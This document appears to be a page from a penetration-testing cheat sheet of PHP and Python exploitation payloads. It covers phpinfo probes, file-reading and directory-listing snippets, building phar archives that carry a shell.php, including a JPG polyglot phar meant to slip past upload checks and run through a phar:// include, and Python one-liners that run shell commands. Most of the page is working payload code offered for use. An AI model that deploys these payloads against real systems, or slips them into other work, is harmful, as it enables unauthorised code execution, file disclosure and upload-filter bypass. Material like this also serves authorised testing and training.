Exploitation Payloads ¶

PHP Info POC ¶

We often run phpinfo to get information.

<?php phpinfo() ?>

Read a file ¶

There are multiple functions you might use:

<?php
$fileContents = file_get_contents('index.php');
$fileContents = show_source('index.php', true);
$fileContents = highlight_file('index.php', true);
$fileContents = readfile('index.php');
echo $fileContents;
?>

Base64 encoding is not always necessary, especially with show_source.

$fileContents = base64_encode($fileContents);

Execute Shell Commands ¶

Refer to webshells#php.

List files in directory ¶

A few different ways to achieve the same output:

<?php
var_dump(scandir("."));

$files = scandir(".");
foreach ($files as $file) {
    echo $file;
}

$dir=dir('.');
while ($f = $dir->read()) {
    echo $f;
}

$dir = opendir(".");
while($f = readdir($dir)) {
    echo $f;
}

Simply zipping the PHP may work. Otherwise, you can use:

<?php // Run 'php --define phar.readonly=0 gen.php'
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
// or: $phar->addFile('shell.php', 'shell.php');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();

➡️ shell.php is the file inside the archive.

To create a Polyglot Phar (Ex: JPG with \xff\xd8 and \xff\xd9)

<?php // php --define phar.readonly=0 gen.php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
$phar->setStub("\xff\xd8\xff\xd9\n<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();

📚 For reference, include 'phar://./shell.phar/shell.php';

Simple python code to run a command.

import os;os.system('ls -1a');
import os;os.popen("ls -1a").read();
import subprocess; subprocess.run(['ls', '-1a']);
import subprocess;print(subprocess.run("whoami", shell=True, stdout=subprocess.PIPE, text=True).stdout)